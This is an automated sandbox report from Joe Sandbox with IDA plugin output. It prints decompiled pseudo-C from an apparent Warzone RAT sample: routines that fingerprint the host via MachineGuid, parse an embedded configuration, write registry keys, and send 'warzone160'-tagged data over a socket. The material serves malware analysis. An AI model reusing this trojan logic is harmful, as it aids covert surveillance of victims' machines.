                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                      • String ID:
                                      • API String ID: 215268677-0
                                      • Opcode ID: efad12f8f23d9c5b4d6586bbf194436d77310c542ac163874c30d65ace41b49c
                                      • Instruction ID: 4492c61e6b550e3af3179b2085cc6d2a46ba6f3733013c0b624f8fa2c4906e35
                                      • Opcode Fuzzy Hash: efad12f8f23d9c5b4d6586bbf194436d77310c542ac163874c30d65ace41b49c
                                      • Instruction Fuzzy Hash: BEF0F971E00218FBDB11ABA0DE49BDEBBB8EF08741F118166EA01F6190D7709F58DB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 33%
                                      			E0040D7E0(intOrPtr* __ecx, void* __edx) {
                                      				void* _v8;
                                      				char _v12;
                                      				char _v16;
                                      				int _v20;
                                      				char _v24;
                                      				int* _t18;
                                      				short** _t23;
                                      				void* _t31;
                                      				void* _t48;
                                      				int* _t50;
                                      				intOrPtr _t53;
                                      
                                      				_t48 = __edx;
                                      				_t35 = __ecx;
                                      				_t50 = __ecx;
                                      				_v8 = 0;
                                      				_v24 = 0;
                                      				_v20 = 0;
                                      				 *((intOrPtr*)(__ecx)) = 0;
                                      				 *((intOrPtr*)(__ecx + 4)) = 0;
                                      				_t53 =  *0x417d38; // 0x14
                                      				if(_t53 != 0) {
                                      					_t18 = 0x417d34;
                                      				} else {
                                      					_t23 = E004033AB( &_v12, L"SOFTWARE\\Microsoft\\Cryptography"); // executed
                                      					RegOpenKeyExW(0x80000002,  *_t23, 0, 0x101,  &_v8); // executed
                                      					asm("sbb esi, esi");
                                      					E004058FB(_v12);
                                      					if(1 != 0) {
                                      						_t31 = E004033AB( &_v12, L"MachineGuid"); // executed
                                      						E0040EAAE( &_v8, _t48, _t31,  &_v24); // executed
                                      						E004058FB(_v12);
                                      						E0040EA99( &_v8);
                                      					}
                                      					E00402C65(_t50, E00405AD0( &_v16,  &_v24));
                                      					E00402DFF( &_v16);
                                      					_t35 = 0x417d34;
                                      					_t18 = _t50;
                                      				}
                                      				E00402C65(_t35, _t18);
                                      				E00402DFF( &_v24);
                                      				E0040EA99( &_v8);
                                      				return _t50;
                                      			}














                                      0x0040d7e0
                                      0x0040d7e0
                                      0x0040d7ea
                                      0x0040d7ec
                                      0x0040d7ef
                                      0x0040d7f2
                                      0x0040d7f5
                                      0x0040d7f7
                                      0x0040d7fa
                                      0x0040d800
                                      0x0040d889
                                      0x0040d806
                                      0x0040d80e
                                      0x0040d824
                                      0x0040d82f
                                      0x0040d831
                                      0x0040d839
                                      0x0040d847
                                      0x0040d850
                                      0x0040d858
                                      0x0040d860
                                      0x0040d860
                                      0x0040d873
                                      0x0040d87b
                                      0x0040d880
                                      0x0040d885
                                      0x0040d885
                                      0x0040d88f
                                      0x0040d897
                                      0x0040d89f
                                      0x0040d8a9

                                      APIs
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                      • RegOpenKeyExW.KERNEL32 ref: 0040D824
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                        • Part of subcall function 0040EAAE: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAD1
                                        • Part of subcall function 0040EAAE: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAF4
                                        • Part of subcall function 0040EA99: RegCloseKey.KERNEL32(?), ref: 0040EAA3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                      • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                      • API String ID: 1903904756-1211650757
                                      • Opcode ID: 685828e6394bcdeec3cc7687aadba9dd991944d549eb196bf2b51eac8efd4c13
                                      • Instruction ID: 3485716d3ccfc602a361c21eb5c9630b085821e7e035ac54aee7b03651fb82ed
                                      • Opcode Fuzzy Hash: 685828e6394bcdeec3cc7687aadba9dd991944d549eb196bf2b51eac8efd4c13
                                      • Instruction Fuzzy Hash: 0F116071A00119ABCB04FBA6C9568EEB739EF58704B60457FB402B31D1DBB81F45DB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E00405042(void* __ecx, void* __edx, intOrPtr _a4) {
                                      				char _v12;
                                      				char _v16;
                                      				char _v24;
                                      				void* _t15;
                                      				void* _t21;
                                      				void* _t38;
                                      				intOrPtr _t39;
                                      				void* _t40;
                                      
                                      				_t37 = __edx;
                                      				_t38 = __ecx;
                                      				if( *((intOrPtr*)(__ecx + 0xc)) != 0xffffffff) {
                                      					_t15 = E00403185( &_v12, "warzone160"); // executed
                                      					E00402DCC( &_v24, __edx, _t15);
                                      					_t31 = _v12;
                                      					E004058FB(_v12);
                                      					_t39 = _a4;
                                      					_t32 = _t40;
                                      					E00402E12(_t40, _t39);
                                      					E00402E12(_t40,  &_v24);
                                      					_t7 =  &_v16; // 0x404a5b
                                      					_t21 = E00405B00(_t7, _t37, _t40, _t32, _v12, _t31);
                                      					_t9 =  &_v16; // 0x404a5b
                                      					_t10 = _t38 + 0xc; // 0x411141, executed
                                      					__imp__#19( *_t10,  *_t9,  *((intOrPtr*)(_t39 + 4)), 0); // executed
                                      					E00402DFF( &_v16);
                                      					E00402DFF( &_v24);
                                      					return 0 | _t21 != 0xffffffff;
                                      				}
                                      				return 0;
                                      			}











                                      0x00405042
                                      0x0040504b
                                      0x00405051
                                      0x0040505f
                                      0x00405068
                                      0x0040506d
                                      0x00405070
                                      0x00405075
                                      0x0040507a
                                      0x0040507d
                                      0x0040508a
                                      0x0040508f
                                      0x00405092
                                      0x0040509f
                                      0x004050a2
                                      0x004050a5
                                      0x004050b6
                                      0x004050be
                                      0x00000000
                                      0x004050c3
                                      0x00000000

                                      APIs
                                      • send.WS2_32(00411141,[J@,?,00000000), ref: 004050A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: send
                                      • String ID: [J@$warzone160
                                      • API String ID: 2809346765-2561178365
                                      • Opcode ID: 684c6170833937b7d6efc60c98c44ea8ea27d2dacfb2c308b00d3130ae1ffb71
                                      • Instruction ID: 247fd1eedd487120c80dd6edb002f6aa9a683da3d56d4597779b5c6f9612ebd2
                                      • Opcode Fuzzy Hash: 684c6170833937b7d6efc60c98c44ea8ea27d2dacfb2c308b00d3130ae1ffb71
                                      • Instruction Fuzzy Hash: D801F5719004057BCB04FBA5CD4ACEFB739EF50324B50423EF122720D1EBB86E159AA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040549D(char __ecx, void* __edx, void* __eflags) {
                                      				char _v8;
                                      				char _v12;
                                      				char _v16;
                                      				char _v24;
                                      				char _v32;
                                      				char _v72;
                                      				char _v148;
                                      				void* _t72;
                                      				void* _t83;
                                      				intOrPtr* _t110;
                                      				char _t157;
                                      				void* _t158;
                                      				void* _t159;
                                      				void* _t160;
                                      				void* _t161;
                                      				void* _t162;
                                      				void* _t163;
                                      				void* _t164;
                                      				intOrPtr _t166;
                                      				intOrPtr _t167;
                                      				intOrPtr _t168;
                                      				intOrPtr _t169;
                                      				intOrPtr* _t170;
                                      
                                      				_t157 = __ecx;
                                      				_v8 = __ecx;
                                      				E0040DF77( &_v148, __eflags);
                                      				E0040DE6E( &_v148, GetModuleHandleA(0)); // executed
                                      				_t72 = E00403185( &_v12, ".bss"); // executed
                                      				E0040DDE1( &_v148,  &_v72, _t72); // executed
                                      				E004058FB(_v12);
                                      				E00402E12( &_v16,  &_v32);
                                      				E00402C65(_t157 + 0x3c,  &_v16); // executed
                                      				E00402DFF( &_v16);
                                      				E004053F7(_t157,  &_v24);
                                      				_t110 = _v24;
                                      				_t166 =  *_t110;
                                      				_t83 = E0040F56D( &_v12, _t110 + 4, _t166); // executed
                                      				E004031FD(_t157 + 0x10, _t83); // executed
                                      				E004058FB(_v12);
                                      				_t158 = _t166 + 4;
                                      				 *((intOrPtr*)(_v8 + 0x14)) =  *((intOrPtr*)(_t110 + _t158));
                                      				_t167 =  *((intOrPtr*)(_t110 + _t158 + 4));
                                      				_t159 = _t158 + 8;
                                      				E004031FD(_v8 + 0x28, E0040F56D( &_v12, _t110 + _t159, _t167));
                                      				E004058FB(_v12);
                                      				_t160 = _t159 + _t167;
                                      				 *((intOrPtr*)(_v8 + 0x18)) =  *((char*)(_t110 + _t160));
                                      				_t168 =  *((intOrPtr*)(_t110 + _t160 + 1));
                                      				_t161 = _t160 + 5;
                                      				E004031FD(_v8 + 0x1c, E0040F56D( &_v12, _t110 + _t161, _t168));
                                      				E004058FB(_v12);
                                      				_t162 = _t161 + _t168;
                                      				 *((intOrPtr*)(_v8 + 0x20)) =  *((char*)(_t110 + _t162));
                                      				_t169 =  *((intOrPtr*)(_t110 + _t162 + 1));
                                      				_t163 = _t162 + 5;
                                      				E004031FD(_v8 + 0x24, E0040F56D( &_v12, _t110 + _t163, _t169));
                                      				E004058FB(_v12);
                                      				_t164 = _t163 + _t169;
                                      				_t170 = _v8;
                                      				 *((intOrPtr*)(_t170 + 0x2c)) =  *((intOrPtr*)(_t110 + _t164));
                                      				 *((intOrPtr*)(_t170 + 0x34)) =  *((char*)(_t110 + _t164 + 4));
                                      				 *((intOrPtr*)(_t170 + 0x38)) =  *((char*)(_t110 + _t164 + 5));
                                      				E0040F56D( &_v8, _t110 + 4 + _t164 + 6,  *((intOrPtr*)(_t110 + _t164 + 6))); // executed
                                      				E004031FD(_t170 + 0x30,  &_v8); // executed
                                      				 *_t170 = 1;
                                      				 *((intOrPtr*)(_t170 + 4)) = 1;
                                      				E004058FB(_v8);
                                      				E00402DFF( &_v24);
                                      				E00402DFF( &_v32);
                                      				return E00401DA8( &_v148);
                                      			}


























                                      0x004054a9
                                      0x004054b1
                                      0x004054b4
                                      0x004054c8
                                      0x004054d5
                                      0x004054e5
                                      0x004054ed
                                      0x004054f9
                                      0x00405505
                                      0x0040550d
                                      0x00405518
                                      0x0040551d
                                      0x00405523
                                      0x00405529
                                      0x00405533
                                      0x0040553b
                                      0x00405543
                                      0x00405549
                                      0x0040554f
                                      0x00405553
                                      0x00405567
                                      0x0040556f
                                      0x00405577
                                      0x0040557d
                                      0x00405583
                                      0x00405587
                                      0x0040559b
                                      0x004055a3
                                      0x004055ab
                                      0x004055b1
                                      0x004055b7
                                      0x004055bb
                                      0x004055cf
                                      0x004055d7
                                      0x004055dc
                                      0x004055e1
                                      0x004055ea
                                      0x004055f2
                                      0x004055fd
                                      0x00405605
                                      0x00405612
                                      0x0040561d
                                      0x0040561f
                                      0x00405622
                                      0x0040562a
                                      0x00405632
                                      0x00405646

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000,?,?,00000000), ref: 004054BB
                                        • Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040318E
                                        • Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040319B
                                        • Part of subcall function 00403185: lstrcpyA.KERNEL32(00000000,?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 004031AE
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                        • Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreeHandleModuleVirtual
                                      • String ID: .bss
                                      • API String ID: 3541657707-3890483948
                                      • Opcode ID: baf41935f97038b4aec3aebc40ee66f0d78a45f9089ffe6a3ed0e970e73d6ec4
                                      • Instruction ID: 6489ceb9c7219e85a73f4e52de8816baad40cc16e327d30d7444be77cc273711
                                      • Opcode Fuzzy Hash: baf41935f97038b4aec3aebc40ee66f0d78a45f9089ffe6a3ed0e970e73d6ec4
                                      • Instruction Fuzzy Hash: 97514F72900109ABCB14EFA5C9919EEB779BF48308B2041BEE4167B1C6DF34AB45DF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E0040331A(short** __ecx, intOrPtr _a4) {
                                      				short** _v8;
                                      				char* _t12;
                                      				void* _t15;
                                      				int _t35;
                                      				short** _t36;
                                      
                                      				_push(__ecx);
                                      				_v8 = __ecx;
                                      				E00402F89(_a4);
                                      				if( *__ecx != 0) {
                                      					_t35 = WideCharToMultiByte(0, 0x200,  *__ecx, E00403027(__ecx), 0, 0, 0, 0);
                                      					_t12 = E0040590A(_t35);
                                      					_t36 = _v8;
                                      					_t22 = _t12;
                                      					WideCharToMultiByte(0xfde9, 0,  *_t36, E00403027(_t36), _t12, _t35, 0, 0);
                                      					_t15 = E00403185( &_v8, _t22); // executed
                                      					E00402EEB(_a4, _t15); // executed
                                      					E004058FB(_v8);
                                      					E004058FB(_t22);
                                      				}
                                      				return _a4;
                                      			}








                                      0x0040331d
                                      0x00403325
                                      0x00403328
                                      0x00403331
                                      0x0040334d
                                      0x00403351
                                      0x0040335b
                                      0x0040335e
                                      0x00403372
                                      0x0040337c
                                      0x00403385
                                      0x0040338d
                                      0x00403394
                                      0x00403394
                                      0x0040339f

                                      APIs
                                        • Part of subcall function 00403027: lstrlenW.KERNEL32(?,0040340C,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 0040302E
                                      • WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,004049AA,?), ref: 00403347
                                        • Part of subcall function 0040590A: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403418,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00405914
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,004049AA,?,?,?,?,?), ref: 00403372
                                        • Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040318E
                                        • Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040319B
                                        • Part of subcall function 00403185: lstrcpyA.KERNEL32(00000000,?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 004031AE
                                        • Part of subcall function 00402EEB: lstrcatA.KERNEL32(00000000,?,?,00000000,?,0040338A,00000000,00000000,?,004049AA,?,?,?,?,?), ref: 00402F17
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
                                      • String ID:
                                      • API String ID: 346377423-0
                                      • Opcode ID: 2390b5bb62517c9a1c67cea177101ed72141fe2a521490e330d04e0c481c3401
                                      • Instruction ID: 0aaded02e3ae7bf0d2239369864b00f8f5a626f43204fa49bd9d75754c287602
                                      • Opcode Fuzzy Hash: 2390b5bb62517c9a1c67cea177101ed72141fe2a521490e330d04e0c481c3401
                                      • Instruction Fuzzy Hash: 09019671701610BBCB14AFA5CC86FEE7A6DDF09755F00003EB906BB2C1CAB45E008798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E0040EAAE(void** __ecx, void* __edx, short** _a4, intOrPtr _a8) {
                                      				int _v8;
                                      				int _v12;
                                      				long _t13;
                                      				void* _t14;
                                      				long _t18;
                                      				short** _t22;
                                      				void** _t30;
                                      
                                      				_push(__ecx);
                                      				_push(__ecx);
                                      				_t22 = _a4;
                                      				_t30 = __ecx;
                                      				_v8 = 0;
                                      				_v12 = 0;
                                      				_t13 = RegQueryValueExW( *__ecx,  *_t22, 0,  &_v12, 0,  &_v8); // executed
                                      				if(_t13 != 0) {
                                      					L3:
                                      					_t14 = 0;
                                      				} else {
                                      					_t34 = E004059A9(_v8);
                                      					_t18 = RegQueryValueExW( *_t30,  *_t22, 0,  &_v12, _t15,  &_v8); // executed
                                      					if(_t18 != 0) {
                                      						goto L3;
                                      					} else {
                                      						E00402D5A(_a8, _t34, _v8);
                                      						_t14 = 1;
                                      					}
                                      				}
                                      				return _t14;
                                      			}










                                      0x0040eab1
                                      0x0040eab2
                                      0x0040eab4
                                      0x0040eabd
                                      0x0040eac9
                                      0x0040eace
                                      0x0040ead1
                                      0x0040ead9
                                      0x0040eb0f
                                      0x0040eb0f
                                      0x0040eadb
                                      0x0040eae3
                                      0x0040eaf4
                                      0x0040eafc
                                      0x00000000
                                      0x0040eafe
                                      0x0040eb05
                                      0x0040eb0c
                                      0x0040eb0c
                                      0x0040eafc
                                      0x0040eb15

                                      APIs
                                      • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAD1
                                        • Part of subcall function 004059A9: GetProcessHeap.KERNEL32(00000000,000000F4,0040DF9F,?,?,00000000,004054B9,?,?,00000000), ref: 004059AC
                                        • Part of subcall function 004059A9: HeapAlloc.KERNEL32(00000000,?,00000000,004054B9,?,?,00000000), ref: 004059B3
                                      • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAF4
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HeapQueryValue$AllocProcess
                                      • String ID:
                                      • API String ID: 174754664-0
                                      • Opcode ID: 81bfe362913150f285dd3635976442bbc7eb86ba4fee69c9ea084fc7581abd89
                                      • Instruction ID: 48af8d47c9c46d6d48ea45f17e0544923e566404208a56d15295a409ea93e58a
                                      • Opcode Fuzzy Hash: 81bfe362913150f285dd3635976442bbc7eb86ba4fee69c9ea084fc7581abd89
                                      • Instruction Fuzzy Hash: 1B014872600008BFDB04DB92CC4AEAF7BBDEB48250B10417AE602E2250E675AE10DB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040EB4B(void** __ecx, void* _a4, short** _a8, int _a12, int _a16) {
                                      				long _t10;
                                      				short** _t22;
                                      				void** _t23;
                                      
                                      				_t23 = __ecx;
                                      				_t22 = _a8;
                                      				if(_a16 == 0 || E0040D4E2(_a4, _t22) != 0) {
                                      					L4:
                                      					_t10 = RegOpenKeyExW(_a4,  *_t22, 0, _a12, _t23); // executed
                                      					if(_t10 != 0) {
                                      						goto L6;
                                      					}
                                      					return _t10 + 1;
                                      				} else {
                                      					_a16 = 0;
                                      					if(RegCreateKeyExW(_a4,  *_t22, 0, 0, 0, _a12, 0, __ecx,  &_a16) != 0) {
                                      						L6:
                                      						return 0;
                                      					}
                                      					E0040EA99(_t23);
                                      					goto L4;
                                      				}
                                      			}






                                      0x0040eb52
                                      0x0040eb55
                                      0x0040eb5b
                                      0x0040eb90
                                      0x0040eb9a
                                      0x0040eba2
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040eb6b
                                      0x0040eb6e
                                      0x0040eb87
                                      0x0040eba7
                                      0x00000000
                                      0x0040eba7
                                      0x0040eb8b
                                      0x00000000
                                      0x0040eb8b

                                      APIs
                                      • RegOpenKeyExW.KERNEL32 ref: 0040EB9A
                                        • Part of subcall function 0040D4E2: RegOpenKeyExW.ADVAPI32 ref: 0040D4F8
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,?,?), ref: 0040EB7F
                                        • Part of subcall function 0040EA99: RegCloseKey.KERNEL32(?), ref: 0040EAA3
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Open$CloseCreate
                                      • String ID:
                                      • API String ID: 1752019758-0
                                      • Opcode ID: 8d475d1efa269e2a793a8d5460e5ebeb4720c3b3d89884df87dbd452481866c6
                                      • Instruction ID: 483383324556a78c30100cd56e4b9f635ef1daee245779487f9ab72d29a3a38b
                                      • Opcode Fuzzy Hash: 8d475d1efa269e2a793a8d5460e5ebeb4720c3b3d89884df87dbd452481866c6
                                      • Instruction Fuzzy Hash: 81011D7120011EBFEF119E92DD80DBB7F6EEF84398714483BF90691150E7799D31AAA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040DDAB(void** __ecx) {
                                      				int _t2;
                                      				void** _t4;
                                      
                                      				_t4 = __ecx;
                                      				ReleaseMutex( *__ecx);
                                      				_t2 = CloseHandle( *_t4); // executed
                                      				return _t2;
                                      			}





                                      0x0040ddac
                                      0x0040ddb0
                                      0x0040ddb8
                                      0x0040ddbf

                                      APIs
                                      • ReleaseMutex.KERNEL32(?,?,0040DA25,?,00405642,?,00000000,00000000,00000000,00000000,?,0000000A,?,?,00000000,.bss), ref: 0040DDB0
                                      • CloseHandle.KERNEL32(?), ref: 0040DDB8
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleMutexRelease
                                      • String ID:
                                      • API String ID: 4207627910-0
                                      • Opcode ID: bd04c0faf05e5da37836fd8d965200a9d67b6e31a4a735bb5188e97be76e9af1
                                      • Instruction ID: 6549a72a09804a51c5b5dbdcc49fbca951cead2705e5ebd63725c9534e5120a8
                                      • Opcode Fuzzy Hash: bd04c0faf05e5da37836fd8d965200a9d67b6e31a4a735bb5188e97be76e9af1
                                      • Instruction Fuzzy Hash: 1EB09236004020EFEB666F14FE0C8D97BB5FF08251315447AF281C1038CBE20D209B84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004010AD(long _a4) {
                                      				void* _t3;
                                      
                                      				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                      				return _t3;
                                      			}




                                      0x004010ba
                                      0x004010c0

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000000,0040F16C,00000800,00000000,00000000,00000000,00000000,?,0040F2C1,?,?,00405268,?,?,000000FE), ref: 004010B3
                                      • RtlAllocateHeap.NTDLL(00000000,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 004010BA
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcess
                                      • String ID:
                                      • API String ID: 1357844191-0
                                      • Opcode ID: d80de2b584812445a5d012a9b3be38b67b9cd4226889692adb9e7f67087b90f4
                                      • Instruction ID: 967b78372da8232bca40c34d5e51b42e113f641506613627c55fd4d831145703
                                      • Opcode Fuzzy Hash: d80de2b584812445a5d012a9b3be38b67b9cd4226889692adb9e7f67087b90f4
                                      • Instruction Fuzzy Hash: BAB00279544201FBDF419BE09F4DB897A65AB45712F01C454F745C5160C6B64470DB35
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405955(long __ecx) {
                                      				void* _t2;
                                      
                                      				_t2 = RtlAllocateHeap(GetProcessHeap(), 0, __ecx); // executed
                                      				return _t2;
                                      			}




                                      0x0040595f
                                      0x00405965

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,00402D70,?,?,?,0040DF25,?,004057B7,?,?,00000000,?,004054CD,00000000), ref: 00405958
                                      • RtlAllocateHeap.NTDLL(00000000,?,0040DF25,?,004057B7,?,?,00000000,?,004054CD,00000000,?,?,00000000), ref: 0040595F
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcess
                                      • String ID:
                                      • API String ID: 1357844191-0
                                      • Opcode ID: f88529cb2b588d7d1a9d87cfa275ee3b3a4586af0706b99854f6fd5211fdef5f
                                      • Instruction ID: dbc3f1063bcf99e66d9654569c95a39a7b8f942eba6d1e41fd440d5f6a973519
                                      • Opcode Fuzzy Hash: f88529cb2b588d7d1a9d87cfa275ee3b3a4586af0706b99854f6fd5211fdef5f
                                      • Instruction Fuzzy Hash: 93A01274400100BBDE0097A09E0DB8535189700302F008010F301C0050C5E104308734
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E00402E63(char** __ecx, void* __eflags, intOrPtr* _a4) {
                                      				char** _v8;
                                      				short* _t15;
                                      				void* _t19;
                                      				int _t39;
                                      
                                      				_push(__ecx);
                                      				_v8 = __ecx;
                                      				 *_a4 = 0;
                                      				if(E00402E52(__ecx) > 0) {
                                      					_t39 = MultiByteToWideChar(0, 2,  *__ecx, E00402E52(__ecx) + 2, 0, 0) + _t14;
                                      					_t15 = E00405878(_t39);
                                      					_t26 = _t15;
                                      					E00402E52(_v8);
                                      					MultiByteToWideChar(0xfde9, 0,  *_v8, 0xffffffff, _t15, _t39);
                                      					_t19 = E004033AB( &_v8, _t15); // executed
                                      					E004031FD(_a4, _t19); // executed
                                      					E004058FB(_v8);
                                      					E004058FB(_t26);
                                      				}
                                      				return _a4;
                                      			}







                                      0x00402e66
                                      0x00402e70
                                      0x00402e73
                                      0x00402e7c
                                      0x00402e98
                                      0x00402e9c
                                      0x00402ea4
                                      0x00402ea6
                                      0x00402ebb
                                      0x00402ec5
                                      0x00402ece
                                      0x00402ed6
                                      0x00402edd
                                      0x00402edd
                                      0x00402ee8

                                      APIs
                                        • Part of subcall function 00402E52: lstrlenA.KERNEL32(00000000,00402E7A,?,00000000,00000000,?,004030A2,004032D4,00000000,-00000001,?,?,004032D4,00000000,?,?), ref: 00402E59
                                      • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,?,00000000,00000000,?,004030A2,004032D4,00000000,-00000001,?), ref: 00402E90
                                        • Part of subcall function 00405878: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004031A8,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 00405886
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,004030A2,004032D4,00000000,-00000001,?,?,004032D4,00000000), ref: 00402EBB
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                        • Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
